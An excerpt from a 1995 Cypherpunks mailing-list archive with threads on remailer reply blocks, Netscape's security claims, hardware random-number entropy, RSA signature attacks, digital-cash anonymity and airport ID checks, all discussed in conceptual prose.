>Has anyone examined the legislative history associated with this statute?
>
>I would be surprised if they were singling out anonymous remailers.  They
may have had other concerns regarding phone abuse, e.g., long distance fraud.  
>
>Then again, I could be full of it...
>
>
Doesn't necessarily matter what the legislative history was.  When some
prosecutor trying to make a name for himself hooks onto this language to
prosecute an anonymous remailer or other perceived miscreant, nobody will
remember what the intent was.  The casebooks are full of perversions of
original intent.
Jon Goldberg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 19 Oct 95 01:48:30 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <DGoAr7.L5s@sgi.sgi.com>
Message-ID: <199510190848.BAA13416@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGoAr7.L5s@sgi.sgi.com>, kelso@netcom.com (kelso) writes:

> Hi,
> One method to take the heat off of the last remailer
> in a chain would be to call on our friend the "one
> time pad".  A message is split into two equal parts
> that only make sense when the two parts are 'xor'ed
> together.  The seperate parts are then sent through
> different paths to the final recepiant (or newsgroup).
> The reader would have to 'xor' the parts together in
> order to read the message.  The remailer could not be
> blamed (as the message was unreadable to him).

> The drawback is that the message would be unreadable
> until both pieces showed up.

No, the drawback is that then all the readers of the newsgroup would
complain that this remailer was cluttering up the newsgroup with
unreadable garbage.  Twice.

Here's another modest proposal.  I note that once you've sent a message,
there appears to be no way for a recipient to reply without knowing who
the originator is.  A simple addition to the remailer protocol would be
to encrypt the message and the control information seperately.  This
would allow the sender of a message to provide a pre-packaged method for
returning a reply.  The recipient of the original message could then
just blindly send his reply to the starting point remailer specified in
the original message by tacking the pre-packaged routing information on
to the front of his message.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: suednim@censored.org (Sue Dee Nim)
Date: Thu, 19 Oct 95 00:12:28 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
Message-ID: <199510190013.AAA04544@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I somehow think they've only gotten started.

Sue....Alice's cousin, waiting on real e$$$$ to start.

>Dr. Frederick B. Cohen wrote:
>> 
>> Jeff Weinstein - Electronic Munitions Specialist Wrote:
>> 
>> ...
>>         "Netscape can be used securely by sufficiently knowledgeable
>>         users who have emasculated their postscript interpreters before
>>         using them to view files of unknown origin, and who have removed
>>         all other known, unknown, and/or undisclosed security holes from
>>         their systems.  Otherwise, Netscape is insecure and should not be
>>         trusted."
>
>  Why did I know you would be showing up in this discussion?  You
>wouldn't be related to alice de 'nonymous would you?
>
>  I don't believe that Netscape claims to be some magic bullet that
>will suddenly make your system secure when you install it.  We also
>don't claim that it will detect viruses.
>
>  Dont you think we've wasted enough bandwidth on this?  I'm sure
>most readers of this list are sick of it by now.
>
>	--Jeff
>
>-- 
>Jeff Weinstein - Electronic Munitions Specialist
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 19 Oct 95 04:15:00 PDT
To: William.Soley@Eng.Sun.COM
Subject: Re: Simple Hardware RNG Idea
Message-ID: <acabee1b010210040955@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 PM 10/5/95, Simon Spero wrote:
>On Thu, 5 Oct 1995, Norman Hardy wrote:
....
>> You presumably use the oddness of the count for your random bit in some
>> predetermined time interval. External radiation can change, but not bias
>> the parity. If the counter saturates, the counter may be biased towards one
>
>Hmmm. But isn't this method slightly biased? If the probability of  N
>events < the probability of N+1 events, wouldn't you need a large number
>of events per bit to make the bias insignificant?
....
What you really need is entropy (information). I propose concatenating
several counts and sending them thru MD5. The counts are distributed the
same way but are independent so that the entropy of the concatenation is
the sum of the entropies. Each count has a Poisson distribution. That tells
you how many bits of entropy there are in the input to the MD5. Take that
many bits, rounded down, as your random bits.

If there are an average of x bits in a time interval then the probability
that the count will be exactly K is (x^K/(K!))exp(-x). That is the Poisson
distribution. The entropy is then:

- sum[i=0 to infinity]  (x^K/(K!))exp(-x)log( (x^K/(K!))exp(-x))
= - sum[i=0 to infinity] (x^K/(K!))exp(-x)(log(x^K/(K!)) - x)
= - sum[i=0 to infinity] (x^K/(K!))exp(-x)(K*log(x) - log(K!) - x)

Here is a klutzy Scheme program to evaluate these:
(define (sum g)(letrec ((ss (lambda (n)
         (if (= n 0) (g 0) (+ (g n) (ss (- n 1)))))))
           (ss 30)))
(define (log2 x)(/ (log x)(log 2)))
(define (fact n)(if (= n 0) 1 (* n (fact (- n 1)))))
(define (p x k) (* (/ (expt x k)(fact k))(exp (- x))))
(define (en n)(sum (lambda(x) (let ((c (p x n)))
  (if (= c 0) 0 (* c (log2 c)))))))

(en 1) => 2.07
(en 3) => 2.92
(en 10) => 3.73
(en 15) => 4.0


I.e. if 1 count is expected on average there are two bits of entropy
in the count (supprising!) and if the count averages 10 then there
are 3.7 bits worth. It goes up as the log.

Before you bet your enterprise on this scheme consider that the math
was done at 03:30 AM.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 02:46:37 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <3085EB9F.5C18@netscape.com>
Message-ID: <9510190913.AA01502@all.net>
MIME-Version: 1.0
Content-Type: text


> > The point is, Netscape CLAIMS to provide security - Miscrosoft doesn't.
> 
>   Here is a quote from Microsoft's Internet Explorer 2.0 Beta announcement,
> which can be found at http://www.microsoft.com/windows/pr/sept2895.htm:
> 
> 
>     Internet Explorer 2.0 also provides users with a secure environment.
>     Complete support for Secure Sockets Layer (SSL) and RSA encryption
>     allows integration with secure sites. In addition, Internet
>     Explorer 2.0 will support Private Communication Technology (PCT),
>     which is an efficient and secure upgrade to the SSL protocol.
>     Internet Explorer will also support Secure Transaction Technology
>     (STT), an electronic payment technology jointly developed by
>     Microsoft and Visa International, as soon as it is available. 
> 
>   There is that pesky word "secure", five times in one paragraph.

I hadn't seen it - everything I said about Netscape (except the money)
applies doubly so to Microsoft - doubly because they have been putting
garbage out for years and should have fixed it long ago.

> > >
> > > A stupid example:
> > > I can replace copy on your machine so that it does a delete instead.
> > > Does that mean that the OS manufacturer has to warn a user about this?
> > 
> > On my machine, if you replace copy with delete, it will be detected
> > before it does the delete, and, unless you are very skilled, when I tell
> > it to copy, the corruption will be automatically corrected.  This is
> > because I use an "integrity shell" - something you guys at Netscape
> > probably never heard of.
> 
>   What if they replace your "integrity shell"?

If you really want to know how this works, you might try reading the 5+
refereed journal articles on the subject, however, to replace the
Integrity shell undetected, you would have to bypass the hardware write
protection on a hard-disk.

> > > There's a point at which one has to hand off the assessment to the buyer.
> > 
> > The point I have been trying to make that many on this list seem to ignore
> > again and again, is that Netscape makes the security claims.  If you don't
> > provide effective protection, don't make the claim.  If you want to make
> > the claim back it up with something other than media hype.
> 
>   We are working on clarifying our security claims.  Here is an
> example from the San Jose Mercury news on Aug. 17, 1995:
> 
>     "We have said for a long time that given the right amount of
>     computer power, that a 40-bit key encrypted message could be
>     decrypted," said Mike Homer, Netscape's vice president of marketing. 

"We" - I take it you are now speaking officially for Netscape?  So how come
Netscape doesn't even know how about Integrity shells and yet claims to
be able to design secure systems for money transfers?

> > > This is my own opinion and also that of anyone who agrees with me.
> > > I'm reading this group because it's very interesting for me personally.
> > > There.
> > 
> > All of our opinions are our own, and my opinion is that Netscape (not you) is:
> > 
> >         - making inadequately supported claims about a nebulous
> >         thing called "security".
> 
>   Here is one definition of the word "security" from the Webster's
> New World Dictionary, Third Edition:
> 
>     protection or defense against attack, espionage, etc.
> 
>   Note that I make no claims that this is Netscape's definition of
> security in our products.

So what IS Netscape's definition?

> >         - using it as a basis to get people to invest millions (billions?)
> >         of dollars.
> 
>   Billions of dollars have not been invested in Netscape.  An examination
> of the prospectus and the current stock price will bear this out.

That's why the ?

>   Here is a quote from the Netscape prospectus:
> 
>     The Company has included in its products an implementation of the
>     Secure Sockets Layer ("SSL"), a security protocol which operates in
>     conjunction with encryption and authentication technology licensed
>     from RSA Data Security, Inc. ("RSA").  Despite the existence of
>     these technologies, the Company's products may be vulnerable to
>     break-ins and similar disruptive problems caused by Internet users.
>     Such computer break-ins and other disruptions would jeopardize the
>     security of information stored in and transmitted through the
>     computer systems of end users of the Company's products...

Excellent - I appreciate the information and withdraw my aspersions relating
to fraud.

>   Of course anyone who is interested in investing in Netscape's
> stock should get and read the entire prospectus.

Absolutely.

> >         - plans to use it to move millions, and eventually billions of
> >         dollars over the Internet, potentially placing a fair chunk of the
> >         world economy (I'm mot kidding) as well as individual privacy
> >         (and thus freedom) at risk.
> 
>   It would have to be many billions of dollars before it becomes
> "a fair chunk of the world economy", and I think that even the
> most optimistic projections of internet commerce put that many
> years in the future.

You must be unaware of Chaos theory.  Even a few hundred million screwed
up in the right way can have a major impact on the global economy. It has
something to dop with the fact that economies work on the basis of peples'
perceptions, not just facts.

> >         - may succeed unless people who do understand the implications
> >         find a way to fix the thing.
> > 
> > These things concern me, so I will stand my ground regardless of the
> > flames and ask, yet again, for someone at Netscape to tell us what you
> > mean by "security" when you make claims about it (I won't repost my
> > questions from a few days ago since you have already ignored them) and
> > why your claims are strong enough for a big chunk of the world economy
> > to rest on it.
> 
>   I don't think that it is reasonable to expect that everyone who
> asks for an official company position on some random mailing list
> will get a response.  The people who make such statements are not
> usually on such lists, and the have other forums for making public
> statements.  Perhaps you should call our PR department for a statement.
> 
>   You are certainly free to "stand your ground", but I am also
> free to not respond to you.

It's a deal.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 02:25:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: airport security
In-Reply-To: <Pine.SUN.3.91.951015172125.14647F-100000@panix.com>
Message-ID: <199510190925.FAA08847@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


DCF writes:
[re: shwoing picture ID to board commercial flights in the U.S.]
> I wonder how many have challenged this.  

During the California-wide Unabomber scare a few months back (before the LAX-
specific scare), someone on the list said they planned to test it at SJC. I 
think it was Dana Orfeo. The trip report has never surfaced, though. 

(Dana ?  Are you there ?)

> I don't see that ID has anything to do with attack threats in any case.  

Neither do I. 

I've seen several articles on the new FAA "security" measures, none of which
offers any explanation from anyone as to why ID checks make anything more
secure.

Any pointers to news articles or govt. press releases that actually state
some rationale for the ID checks, however spurious ?

> I suppose they are trying to discourage people from buying tickets in 
> false names so that the databanks can be more useful to the authorities.

It's bad enough that it is "illegal" (at least according to some recent ARC 
flight coupons of mine) to sell or otherwise transfer your tickets to someone
else. I'd love to see them try to justify crap like that.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 02:30:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510190848.BAA13416@orac.engr.sgi.com>
Message-ID: <199510190930.FAA00549@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein writes:
> A simple addition to the remailer protocol would be
> to encrypt the message and the control information seperately.  This
> would allow the sender of a message to provide a pre-packaged method for
> returning a reply.  The recipient of the original message could then
> just blindly send his reply to the starting point remailer specified in
> the original message by tacking the pre-packaged routing information on
> to the front of his message.

Congratulations, you have reinvented what we usually call "reply blocks". 
See the archives and some remailer help files & web pages.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 03:41:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: MKE Threat Assessments
Message-ID: <199510191041.GAA07430@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[quotes pulled out of context, sorry]
> I also strongly believe that you gravely overestimate the threat of MKE, 

I like to think of MKE in terms of a scenario like the Watergate break-in.
Imagine that Haldeman and Dean pull the right strings to get Liddy the 
escrowed keys used by the Democratic National Cmte. to encrypt their campaign
plans. 

George Bush's favorite millstone, J. Danforth Quayle, seemed to do a
pretty good job of manipulating the legal system when it looked like Brett
Kimberlin wanted to chat with the media about his pot customers. I believe
this sort of abuse is a significant threat.

> [and] probably overestimate the interest LEAs have in your personal affairs, 

Ordinarily, I'd say you're right (speaking only for myself). But I suspect
that my active contributions to this list may have put my name in somebody's
Oracle database. (I certainly underestimated the LEAs' interest in Leonard 
Bernstein's personal affairs.) What a waste of time and tax dollars !

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Thu, 19 Oct 95 04:17:28 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <951019071622.2000cf@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 Futplex writes:
>DCF writes:
>[re: shwoing picture ID to board commercial flights in the U.S.]
>> I wonder how many have challenged this.  

>Any pointers to news articles or govt. press releases that actually state
>some rationale for the ID checks, however spurious ?

>> I suppose they are trying to discourage people from buying tickets in 
>> false names so that the databanks can be more useful to the authorities.

>It's bad enough that it is "illegal" (at least according to some recent ARC 
>flight coupons of mine) to sell or otherwise transfer your tickets to someone
>else. I'd love to see them try to justify crap like that.

   Without actually agreeing with the FAA, the reason you can't have a name
   other than your own on your ticket, as well as why you are required to
   be in your assigned seat on take-off and landing is because if there is 
   a plane crash, they need to be able to identify an otherwise difficult
   to identify body. This does have some relevance to airport security if
   a plane is blown up.

                                 Sorry about this,
                                      Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 19 Oct 95 07:28:13 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <9510190043.AA11578@all.net>
Message-ID: <199510191427.HAA10783@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
>3 - I would have figured at least one of you would have looked up the
>chosen plaintext attack and told me why Netscape keys can't be gotten
>at this way.  I think there's an off change I could win a grand!

I had missed this in your original posting.  Here it is again:

> Concept 3 - There is a chosen plaintext attack against the RSA (published
> in the 1980s in a Crypto conference (IACR?).
> 
>         Attack 50 - Use your Hot Java capability to sign selected
>         message after message till the attacker derives your private key.
>        I think this takes one or two messages per bit of private key.

Chosen plaintext attacks against RSA don't work in the context of RSA
signatures, because the input to the RSA algorithm is a hash of the
message being signed.  You can't control the hash the way you need to to
implement a chosen plaintext attack.  (You can't "choose" the hash.)

For example, one kind of chosen plaintext attack would be to get an RSA
signature on 2, on 3, on 5, on 7, and so on, on all the primes.  This
would let you create an RSA signature on any number by factoring the
number and multiplying the RSA signatures of its prime factors.  But
there is no way to do this in practice because as RSA-based signatures
are actually implemented only hashes are signed.  This is done exactly to
prevent this and similar attacks.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 19 Oct 95 07:31:16 PDT
To: cypherpunks@toad.com
Subject: Re: STT - useable in real life ?
In-Reply-To: <199510191347.XAA17540@oznet02.ozemail.com.au>
Message-ID: <199510191430.HAA11213@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


lyalc@ozemail.com.au (lyal collins) writes:

>From reading the STT specs, a 'credential' is made up of typically 4
>certificates - root, country CA, issuer Ca, and cardholder/merchant.
>Two certificates are based upon a 1024 bit public keys, 1 (root) is 2048
>while the cardholder PK is 512/768 bit.
>I believe a decrypt operation is required to verify each certificate.

Usually, decrypt operations are needed to ISSUE certificates but not to
verify them.  Verification is equivalent to an encrypt operation using a
small exponent, and may be roughly about 100 times faster than a decrypt.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip R. Moyer <prm@rome.isl.sri.com>
Date: Thu, 19 Oct 95 07:41:40 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
In-Reply-To: <199510190925.FAA08847@opine.cs.umass.edu>
Message-ID: <9510191441.AA01000@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> > I don't see that ID has anything to do with attack threats in any case.  
> Neither do I. 

> -Futplex <futplex@pseudonym.com>

Just a few data points, for anyone who cares.  I've been through security
at San Jose, LaGuardia, O'hare, Saint Louis, and Dallas in the past two
months.  I have _never_ been asked for ID.  Just a valid ticket and, at
checkin, the usual "Did you pack these yourself?  Have you been in possession
of your luggage at all times?" questions.

Cheers,
Phil

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIZlD8T6R9aMgmQ9AQGLxAQAxT8rbDhN7FoltKD8CCq2wHsywpGkhK8z
gp5qd3mXvfkf5DB/dxbSm9ZTkjWwSrwc2nmy3BMXVPmJwyvahSZ6vJEwVRif/2f0
UJ0id+ZpMLlAn91Sk8QjnOLx5iif7OFY39L7NQPFU/TTGveleIbXxQ2Ko5a3P+t4
7if0iCNRRmc=
=FHgX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Thu, 19 Oct 95 07:40:27 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: [NOISE] Re: Postscript in Netscape
Message-ID: <199510191439.JAA05986@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) wrote:

>> > The point I have been trying to make that many on this list seem to ignore
>> > again and again, is that Netscape makes the security claims.  If you don't
>> > provide effective protection, don't make the claim.  If you want to make
>> > the claim back it up with something other than media hype.
>> 
>>   We are working on clarifying our security claims.  Here is an
>> example from the San Jose Mercury news on Aug. 17, 1995:
>> 
>>     "We have said for a long time that given the right amount of
>>     computer power, that a 40-bit key encrypted message could be
>>     decrypted," said Mike Homer, Netscape's vice president of marketing. 
>
> "We" - I take it you are now speaking officially for Netscape?  So how come
> Netscape doesn't even know how about Integrity shells and yet claims to
> be able to design secure systems for money transfers?

<flame=on>

Give it a rest, Doc.  You give all the rest of us Ph.D.'s a bad rep with
this crap.  Of course, if you went to that 4-year vocational school to get
an M.D., I guess that's understandable.

If you are so illiterate that you can't read the ascription (it says right
up there, "said Mike Homer, Netscape's vice president of marketing"), then
why do you (a) waste bandwidth and our time to go through this drivel, and
(b) flame one Netscape employee for not knowing everything you know?  If
there are all of 5+ refereed publications in this area, how about giving
references?  It would take up less space than your recurring venom eruption!
Or couldn't you understand the papers, given that you couldn't understand
the news clip...

<flame=off>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzACleQAAAEH/2+41W3bZPuWU1gv6A0bq3a57bgCiCAbU1QY41f+NI1I8i/+
a/L314RIpCR0iCZhsNMHNI9rVovsbmOQE4Cf9YYL3cClUoE2VAsLOi9LAjlN8qYc
kmAqpsGQ39eaKrnlC/0lxJtFZgypT4m9UIsTU986y3gyy+ZTWwxtbDaLBEdsTiH/
e+zosoBiXmwWYY1n+5yvaKLGMUwa20AKdoRCUgqhJQpkW0nAvItU6WhaqxwH6JXp
KCNsuP6k8FBmcKZfSSvUphSOIJnARAq9K9UPhj5BeAy1vKZ416jfgeYQUTxHQOMT
rTiQOYR/oAR35gBpGYg6p1lu6Ma5eDPtpBPadUUABRG0IFBhdHJpY2sgTGFtYiA8
cGRsYW1iQGlxdWVzdC5jb20+
=DZzp
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Thu, 19 Oct 95 06:49:05 PDT
To: die@die.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
In-Reply-To: <9510190432.AA04434@pig.die.com>
Message-ID: <199510191346.JAA10841@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


 > 	Perhaps someone with more semiconductor physics background
 > can correct me, but my understanding is that some kinds of nuclear
 > radiation can be used to erase OTP EPROMS.   I suppose this might damage
 > the crystal lattice badly enough to render the device useless in
 > some bit positions or reduce data retention time a lot, but I sure
 > wouldn't bet any security on devices out there not being 
 > arbitrarily reprogrammable (thus using bits to represent digital
 > coins in a wallet that get reset when they are spent is not a
 > good idea).

You might want to take a look at the paper I mentioned, then: I
believe that irradiation of the OTP EPROM to return all bits to "ones"
is too blunt a tool to do you any good. A virgin EPROM has a value of
zero in the suggested scheme. And, as mentioned, flipping random sets
of bits is strongly likely to get you caught.

Note also that the encoding is strongly tied to the laser-etched serial
number on the chip, so replay attacks between two different chips --
i.e. copying a fully loaded chip to a virgin chip -- won't work.

However, it does open up the scheme to replay attacks, if you can load
the chip with value, spend it, irradiate it, and then successfully
reprogram the chip with the exact same values you recorded.

Good point.

I seem to remember PROMs actually undergoing physical, rather than
electrical, state changes (that were presumably nonreversible). Am I
recalling old technology, or am I just plain mistaken?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chip@communities.com (Chip Morningstar)
Date: Thu, 19 Oct 95 09:55:15 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
Message-ID: <9510191659.AA24317@ communities.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, I just noticed his email address:

> fc@all.net (Dr. Frederick B. Cohen) writes:
> etc.

Sorta makes ya think, huh?

--
-------------------------------------------------------------------------------
| Chip Morningstar                     |                                      |
| Electric Communities                 | "I'm old enough to be living in      |
| 280 2nd Street, Los Altos, CA 94022  |  the future I was warned about."     |
| 415-917-5640                         |         -- Myron Krueger             |
| chip@communities.com                 |                                      |
-------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 19 Oct 95 10:23:54 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510191722.KAA06757@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> :I've deleted the rest of your content-free rant.  Instead of alluding to
> :some "flawed algorithm", why not tell us about the hole you say you've
> :found in netscape?

OK, Netscape functions by DESIGN as an enhanced delivery vehicle.

Is that a sufficient explanation of the hole?? or is more detail necessary
(which follows): 

     Netscape blindly trusts any and all ports on all servers.  On the 
     basis of this trust, it begins a negotiation with a server that 
     might well have a dynamic deliverability capability.  The client then 
     examines a Content-type header, trusts the content-type to decide 
     what application it should launch, and then launches and processes 
     the data block it is fed, all on good faith.

     It even trusts the server to redirect it to any arbitrary destination
     which it automatically loads and then executes.

Is this enough of an explanation??  Or should I paraphrase:

      Netscape is a gateway that permits an untrustworthy server to take 
      complete control of a client's machine.  The server can tell the 
      client where it should go, what it should load and how often, and
      what applications to execute on the client machine, as though this 
      arbitrary server were its master.

Does this help to underscore the problem??  

The Netscape Navigator client was DESIGNED to be controlled remotely from
any machine on the Internet.  This is the "flawed algorithm".  W3 was
meant to be hypertext ... not a gateway that permits a server to deliver
customized byte bombs down a clearcut path by remote-control. 

If people don't know that you don't let another person (or machine) take
control of your machine and run programs on it ... well, like I said in
the past. 

>   "Let me make this absolutely clear.
>
>   It should not be up to non-US citizens like myself to safe-guard US
>   economic security, and protect vital national interests.  It is not 
>   my job and certainly not my responsibility to protect the international
>   public and Fortune 500 companies from poor security."

So without giving out another "exploitation algorithm" to the Internet,
without extending a helping hand to Japan to retaliate against the US for
the American Japanese auto surveillance, I will simply quote from two
sources which are "public record" and mentioned in the FAQ. 

From the "Orange Book", one of the volumes of the Department of Defence's
"Rainbow Series" more commonly known as TCSEC (Trusted Computer System
Evaluation Criteria) and available from: 

 U.S. Government Printing Office         INFOSEC Awareness Office
 Superintendent of Documents     - or -  National Computer Security Centre
 Washington, DC 20402	                 9800 Savage Road	
                                         Fort George G. Meade, MD  20755-6000

which stipulates that:

      "... it is required that ADP (Automated Data Processing) systems
       that "process, store, or use classified data and produce 
       classified information will, with reasonable dependability, prevent:

        a. Deliberate or inadvertent access to classified material by
           unauthorized persons, and

        b. Unauthorized manipulation of the computer and its associated 
           peripheral devices."

The above quoted reference is public information.  And, since Netscape is
making "no-comment" I will quote Netscape's public information. 

>   NETSCAPE CLIENT APIS (NCAPIS) 2.0
>          The NCAPIs are designed to allow third-party applications to
>          remotely control the Netscape Navigator client. They are
>          platform specific, utilizing the platform's native method of
>          interprocess communication (IPC). These APIs are not final
>          and may change with the release of version 1.1 of Netscape
>          Navigator (they do not work with Netscape Navigator 1.0).

Herein is the "flawed algorithm" which is just a fancy way of saying that
it's a flawed idea.  And this isn't new ... it's been there for a long
time. 

Generally, we don't routinely trust every other computer, foreign or 
domestic on the Internet to manipulate us by remote control.  This is
as basic as the idea that we don't give out our PIN numbers with our 
banking cards to anyone who asks us.  

If someone tries to suggest differently, then they are a fool.

Let's recall that Version 1.1 of Navigator was released long ago, and
trusts every machine on the Internet to do just that.  It trusts every
other machine on the Internet to be "trustworthy".  Whether that machine
is foreign or domestic.  We are not speaking about the new and improved --
feature added -- "beta" 2.0 software, we are speaking of the software that
AT&T is using internally and is selling to its customers as we speak as a 
"co-branded" product.

Software which AT&T security "approved" of in direct contravention of the
most basic of basic security principles.

Let me reiterate this.

Netscape's current existing software was designed in direct contravention
of the US Department of Defence's evaluation criteria for Trusted Computer
Systems, the TCSEC.  It also contravenes the ITSEC (Information Technology
Security Evaluation Criteria) which is a document developed by the
British, German, French, and Netherlands governments.

(Anyone can get a free copy of ITSEC by writing to the Commission of the
European Communities in Brussels.)

Netscape forgot one thing about trust.  If you "trust everyone" ... even if
you always trust everyone, you always cut the cards.

And when you're playing poker at these stakes ... well ... 'nuff said.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.  Please don't shoot the messenger.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S If this is confusing to anyone, please direct your comments to
      one or all of the following newsgroups:

                   alt.2600
                   alt.security
                   comp.security.announce
                   comp.security.misc
                   comp.virus





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 19 Oct 95 10:42:29 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
In-Reply-To: <m0t5ej6-0002ebC@horten>
Message-ID: <199510191741.KAA09854@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Andreas Bogk <andreas@artcom.de> writes:

>In the Cyphernomicon, section 12.6.6, Tim May writes:

>             - Chaum went to great lengths to develop system which
>                preserve anonymity for single-spending instances, but
>                which break anonymity and thus reveal identity for double-
>                spending instances. I'm not sure what market forces
>                caused him to think about this as being so important, but
>                it creates many headaches. Besides being clumsy, it
>                require physical ID, it invokes a legal system to try to
>                collect from "double spenders," and it admits the
>                extremely serious breach of privacy by enabling stings.
>                For example, Alice pays Bob a unit of money, then quickly
>                Alice spends that money before Bob can...Bob is then
>                revealed as a "double spender," and his identity revealed
>                to whomver wanted it...Alice, IRS, Gestapo, etc. A very
>                broken idea. Acceptable mainly for small transactions.

>But as far as I got Chaums idea, Alice would not reveal Bobs identity,
>but rather her own. Am I missing a point here?

There is an attack here, but the text doesn't go into detail about it.
You have to assume that (as with the current ecash implementation from
Digicash) people have non-anonymous accounts with the bank.  If Alice
wants to know Bob's identity she can collude with the bank to find
out.  As Tim describes, she gives Bob some money, then quickly deposits
the coins herself.  In effect, she intentionally double-spends (with
the bank's permission).  When Bob makes his deposit, his coins are
recognized as matching those which Alice double-spent.  So if Alice
was, say, an agent involved in a government "sting", and bought bootleg
software from Bob, his identity can in fact be learned when he deposits
the money.

Actually with the DigiCash system and in fact all of the ecash systems I
know about, you don't have to get so fancy; Alice can simply give the
bank a record of her transaction with Bob (the coins she sent him) and
these will be recognized when Bob deposits them.

Lucky Green has been discussing ways in which people could exchange coins
anonymously even with DigiCash's ecash in order to provide some immunity
from such attacks.

Hal



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 19 Oct 95 10:44:55 PDT
To: cypherpunks@toad.com
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
In-Reply-To: <9510190245.AA20897@toad.com>
